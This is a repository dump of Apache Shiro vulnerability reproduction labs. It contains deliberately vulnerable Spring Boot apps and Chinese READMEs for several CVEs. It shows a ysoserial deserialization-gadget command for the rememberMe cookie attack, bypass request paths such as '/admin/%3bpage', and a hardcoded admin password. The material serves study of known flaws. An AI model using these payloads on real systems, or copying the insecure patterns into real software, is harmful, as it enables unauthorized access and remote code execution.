├── .gitignore ├── shiro-721 ├── target │ ├── .plxarc │ ├── jacoco-it.exec │ ├── samples-web-1.4.1.war │ ├── maven-status │ │ └── maven-compiler-plugin │ │ │ └── testCompile │ │ │ └── default-testCompile │ │ │ ├── createdFiles.lst │ │ │ └── inputFiles.lst │ ├── maven-archiver │ │ └── pom.properties │ ├── samples-web-1.4.1 │ │ ├── WEB-INF │ │ │ ├── lib │ │ │ │ ├── jstl-1.2.jar │ │ │ │ ├── log4j-1.2.17.jar │ │ │ │ ├── shiro-core-1.4.1.jar │ │ │ │ ├── shiro-lang-1.4.1.jar │ │ │ │ ├── shiro-web-1.4.1.jar │ │ │ │ ├── slf4j-api-1.7.21.jar │ │ │ │ ├── commons-codec-1.10.jar │ │ │ │ ├── shiro-cache-1.4.1.jar │ │ │ │ ├── shiro-event-1.4.1.jar │ │ │ │ ├── jcl-over-slf4j-1.7.21.jar │ │ │ │ ├── slf4j-log4j12-1.7.21.jar │ │ │ │ ├── commons-beanutils-1.9.3.jar │ │ │ │ ├── shiro-config-core-1.4.1.jar │ │ │ │ ├── shiro-config-ogdl-1.4.1.jar │ │ │ │ ├── shiro-crypto-core-1.4.1.jar │ │ │ │ ├── shiro-crypto-hash-1.4.1.jar │ │ │ │ ├── commons-collections-3.2.2.jar │ │ │ │ └── shiro-crypto-cipher-1.4.1.jar │ │ │ ├── classes │ │ │ │ ├── META-INF │ │ │ │ │ ├── NOTICE │ │ │ │ │ ├── DEPENDENCIES │ │ │ │ │ └── LICENSE │ │ │ │ └── log4j.properties │ │ │ ├── web.xml │ │ │ └── shiro.ini │ │ ├── index.jsp │ │ ├── include.jsp │ │ ├── logout.jsp │ │ ├── account │ │ │ └── index.jsp │ │ ├── style.css │ │ ├── home.jsp │ │ └── login.jsp │ ├── test-classes │ │ ├── org │ │ │ └── apache │ │ │ │ └── shiro │ │ │ │ └── test │ │ │ │ └── ContainerIntegrationIT.class │ │ └── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ ├── classes │ │ ├── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ │ └── log4j.properties │ ├── maven-shared-archive-resources │ │ └── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ └── failsafe-reports │ │ ├── org.apache.shiro.test.ContainerIntegrationIT.txt │ │ ├── failsafe-summary.xml │ │ └── TEST-org.apache.shiro.test.ContainerIntegrationIT.xml ├── 20210630171858.jpg ├── src │ ├── main │ │ ├── webapp │ │ │ ├── index.jsp │ │ │ ├── include.jsp │ │ │ ├── logout.jsp │ │ │ ├── account │ │ │ │ └── index.jsp │ │ │ ├── style.css │ │ │ ├── WEB-INF │ │ │ │ ├── web.xml │ │ │ │ └── shiro.ini │ │ │ ├── home.jsp │ │ │ └── login.jsp │ │ └── resources │ │ │ └── log4j.properties │ └── test │ │ └── java │ │ └── org │ │ └── apache │ │ └── shiro │ │ └── test │ │ └── ContainerIntegrationIT.java ├── README.md └── pom.xml ├── shiro_cve-2020-17510 ├── src │ └── main │ │ ├── resources │ │ └── application.properties │ │ └── java │ │ └── com │ │ └── l4g │ │ └── springshiro │ │ ├── SpringShiroApplication.java │ │ ├── MyRealm.java │ │ ├── controllers │ │ └── LoginController.java │ │ └── config │ │ └── ShiroConfig.java ├── README.md └── pom.xml ├── shiro_cve-2020-11989 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── syclover │ │ │ └── srpingbootshiro │ │ │ ├── SrpingbootShiroApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── java │ │ └── org │ │ └── syclover │ │ └── srpingbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210128172206395.png ├── image-20210128172253231.png ├── README.md └── pom.xml ├── shiro_cve-2020-13933 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── test │ │ │ └── springbootshiro │ │ │ ├── SrpingbootShiroApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── java │ │ └── org │ │ └── test │ │ └── springbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210128175855632.png ├── image-20210128175913047.png ├── README.md └── pom.xml ├── shiro_cve-2020-1957 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── javaboy │ │ │ └── shirobasic │ │ │ ├── ShiroBasicApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── java │ │ └── org │ │ └── javaboy │ │ └── shirobasic │ │ └── ShiroBasicApplicationTests.java ├── image-20210128161242932.png ├── image-20210128161322861.png ├── README.md └── pom.xml ├── shiro_cve-2020-17523 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── test │ │ │ └── springbootshiro │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ ├── ShiroConfig.java │ │ │ └── SpringbootShiroApplication.java │ └── test │ │ └── java │ │ └── org │ │ └── test │ │ └── springbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210208145249325.png ├── image-20210208145354757.png ├── image-20210208145429278.png ├── README.md └── pom.xml ├── shiro-550 ├── image1.PNG ├── src │ ├── main │ │ ├── resources │ │ │ ├── application.properties │ │ │ └── templates │ │ │ │ ├── error.html │ │ │ │ ├── test.html │ │ │ │ ├── hello.html │ │ │ │ └── login.html │ │ └── java │ │ │ └── com │ │ │ └── example │ │ │ └── shiro550 │ │ │ ├── Shiro550Application.java │ │ │ ├── shiro │ │ │ ├── MainRealm.java │ │ │ └── ShiroConfig.java │ │ │ ├── DemoController.java │ │ │ └── exp │ │ │ └── GenPayload.java │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── shiro550 │ │ └── Shiro550ApplicationTests.java ├── .gitignore ├── README.md └── pom.xml └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | *.iml -------------------------------------------------------------------------------- /shiro-721/target/.plxarc: -------------------------------------------------------------------------------- 1 | maven-shared-archive-resources -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=9090 -------------------------------------------------------------------------------- /shiro-550/image1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-550/image1.PNG -------------------------------------------------------------------------------- /shiro-721/20210630171858.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/20210630171858.jpg -------------------------------------------------------------------------------- /shiro-721/target/jacoco-it.exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/jacoco-it.exec -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1.war -------------------------------------------------------------------------------- /shiro-550/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | # 应用名称 2 | spring.application.name=shiro-550 3 | # 应用服务 WEB 访问端口 4 | server.port=8080 5 | 6 | 7 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/image-20210128161242932.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-1957/image-20210128161242932.png -------------------------------------------------------------------------------- /shiro_cve-2020-1957/image-20210128161322861.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-1957/image-20210128161322861.png -------------------------------------------------------------------------------- /shiro-721/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | org\apache\shiro\test\ContainerIntegrationIT.class 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/image-20210128172206395.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-11989/image-20210128172206395.png -------------------------------------------------------------------------------- /shiro_cve-2020-11989/image-20210128172253231.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-11989/image-20210128172253231.png -------------------------------------------------------------------------------- /shiro_cve-2020-13933/image-20210128175855632.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-13933/image-20210128175855632.png -------------------------------------------------------------------------------- /shiro_cve-2020-13933/image-20210128175913047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-13933/image-20210128175913047.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145249325.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145249325.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145354757.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145354757.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145429278.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145429278.png -------------------------------------------------------------------------------- /shiro-721/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Created by Apache Maven 3.6.3 2 | version=1.4.1 3 | groupId=org.apache.shiro.samples 4 | artifactId=samples-web 5 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jstl-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jstl-1.2.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/log4j-1.2.17.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/log4j-1.2.17.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-lang-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-lang-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-web-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-web-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-api-1.7.21.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-api-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-codec-1.10.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-codec-1.10.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-cache-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-cache-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-event-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-event-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jcl-over-slf4j-1.7.21.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jcl-over-slf4j-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-log4j12-1.7.21.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-log4j12-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-beanutils-1.9.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-beanutils-1.9.3.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-ogdl-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-ogdl-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-hash-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-hash-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | C:\Users\admin\Downloads\shiro\samples\web\src\test\java\org\apache\shiro\test\ContainerIntegrationIT.java 2 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-cipher-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-cipher-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/test-classes/org/apache/shiro/test/ContainerIntegrationIT.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/test-classes/org/apache/shiro/test/ContainerIntegrationIT.class -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/error.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Error 6 | 7 | 8 |

error

9 | 10 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Title 6 | 7 | 8 |

test thymeleaf

9 | 10 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/hello.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Hello 6 | 7 | 8 |

Login success.

9 | 10 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-17510) 2 | 3 | ### 漏洞描述 4 | 5 | 由于Shiro在处理url时与Spring存在差异,在使用Apache Shiro与Spring时,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。 6 | 7 | ### 漏洞复现 8 | 9 | 暂无POC 10 | 11 | ### 参考链接 12 | 13 | * https://github.com/plr47/VulRecurrence-JAVA/tree/main/CVE-2020-17510 -------------------------------------------------------------------------------- /shiro-550/src/test/java/com/example/shiro550/Shiro550ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro550ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/test/java/org/test/springbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/test/java/org/test/springbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/test/java/org/syclover/srpingbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/org.apache.shiro.test.ContainerIntegrationIT.txt: -------------------------------------------------------------------------------- 1 | ------------------------------------------------------------------------------- 2 | Test set: org.apache.shiro.test.ContainerIntegrationIT 3 | ------------------------------------------------------------------------------- 4 | Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10.956 s - in org.apache.shiro.test.ContainerIntegrationIT 5 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/Shiro550Application.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro550Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro550Application.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/SpringShiroApplication.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class SpringShiroApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(SpringShiroApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/ShiroBasicApplication.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class ShiroBasicApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(ShiroBasicApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro-550/.gitignore: -------------------------------------------------------------------------------- 1 | HELP.md 2 | target/ 3 | !.mvn/wrapper/maven-wrapper.jar 4 | !**/src/main/** 5 | !**/src/test/** 6 | 7 | ### STS ### 8 | .apt_generated 9 | .classpath 10 | .factorypath 11 | .project 12 | .settings 13 | .springBeans 14 | .sts4-cache 15 | 16 | ### IntelliJ IDEA ### 17 | .idea 18 | *.iws 19 | *.iml 20 | *.ipr 21 | 22 | ### NetBeans ### 23 | /nbproject/private/ 24 | /nbbuild/ 25 | /dist/ 26 | /nbdist/ 27 | /.nb-gradle/ 28 | build/ 29 | 30 | ### VS Code ### 31 | .vscode/ 32 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/test/java/org/javaboy/shirobasic/ShiroBasicApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.junit.Test; 4 | import org.junit.runner.RunWith; 5 | import org.springframework.boot.test.context.SpringBootTest; 6 | import org.springframework.test.context.junit4.SpringRunner; 7 | 8 | @RunWith(SpringRunner.class) 9 | @SpringBootTest 10 | public class ShiroBasicApplicationTests { 11 | 12 | @Test 13 | public void contextLoads() { 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/failsafe-summary.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 1 4 | 0 5 | 0 6 | 0 7 | 8 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-13933) 2 | 3 | ### 漏洞描述 4 | 5 | Apache Shiro 的 CVE-2020-11989 修补补丁依旧存在缺陷,由于shiro和spring在处理url中仍然存在差别,通过构造特殊的HTTP请求,可以再次绕过授权,访问未授权的信息。 6 | 7 | 影响范围: 8 | 9 | * Shiro < 1.6.0 10 | 11 | ### 漏洞复现 12 | 13 | 访问`/admin/page`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 14 | 15 | image-20210128175913047 16 | 17 | 访问`/admin/%3bpage`,成功绕过`authc`拦截器,获取到了资源。 18 | 19 | image-20210128175855632 20 | 21 | ### 参考链接 22 | 23 | * [Apache shiro安全漏洞(CVE-2020-13933)分析](https://xz.aliyun.com/t/8230) -------------------------------------------------------------------------------- /shiro-550/README.md: -------------------------------------------------------------------------------- 1 | # Shiro-550 RememberMe反序列化漏洞(CVE-2016-4437) 2 | 3 | ### 漏洞描述 4 | 5 | Apache Shiro默认使用了`CookieRememberMeManager`,其处理cookie的流程是:得到rememberMe的cookie值 》 Base64解码 》 AES解密 》 反序列化。因AES密钥为硬编码,导致攻击者可以构造恶意数据造成反序列化的RCE漏洞。 6 | 7 | ### 漏洞复现 8 | 9 | 使用ysoserial生成CommonsBeanutils1的Gadget: 10 | 11 | ```bash 12 | java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "calc.exe" > poc.ser 13 | ``` 14 | 15 | 运行`GenPayload.java`生成加密后的Payload,放入Cookie中的rememberMe字段发送即可: 16 | 17 | ![image1](image1.PNG) 18 | 19 | ### 参考链接 20 | 21 | * [shiro550反序列化分析](https://www.cnblogs.com/twosmi1e/p/14279403.html) 22 | 23 | * [Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)](https://vulhub.org/#/environments/shiro/CVE-2016-4437/) -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/SrpingbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.boot.builder.SpringApplicationBuilder; 6 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 7 | 8 | @SpringBootApplication 9 | public class SrpingbootShiroApplication extends SpringBootServletInitializer { 10 | 11 | @Override 12 | protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) { 13 | return builder.sources(SrpingbootShiroApplication.class); 14 | } 15 | 16 | public static void main(String[] args) { 17 | 18 | SpringApplication.run(SrpingbootShiroApplication.class, args); 19 | } 20 | 21 | } 22 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-1957) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 影响版本:Shiro < 1.5.2 8 | 9 | ### 漏洞复现 10 | 11 | 访问`/hello/123`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 12 | 13 | image-20210128161322861 14 | 15 | 访问`/hello/123/`,成功绕过`authc`拦截器,获取到了资源。 16 | 17 | image-20210128161242932 18 | 19 | ### 参考链接 20 | 21 | * [Shiro 权限绕过漏洞(CVE-2020-1957)复现](https://blog.csdn.net/xuandao_ahfengren/article/details/108218864) 22 | * [CVE-2020-1957 shiro权限绕过漏洞分析](https://blog.csdn.net/qq_22807425/article/details/108283839) 23 | * [Shiro 权限绕过漏洞分析(CVE-2020-1957)](https://blog.riskivy.com/shiro-%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88cve-2020-1957%EF%BC%89/) -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 11 | return null; 12 | } 13 | @Override 14 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 15 | String username = (String) token.getPrincipal(); 16 | if (!"admin".equals(username)) { 17 | throw new UnknownAccountException("账户不存在!"); 18 | } 19 | return new SimpleAuthenticationInfo(username, "123456", getName()); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-11989) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 影响范围: 8 | 9 | * Shiro < 1.5.3 10 | 11 | ### 漏洞复现 12 | 13 | 环境 14 | 15 | | Shiro Version | Shiro 1.5.1 | 16 | | :------------ | :--------------------- | 17 | | Web Server | Tomcat 8.5.53 | 18 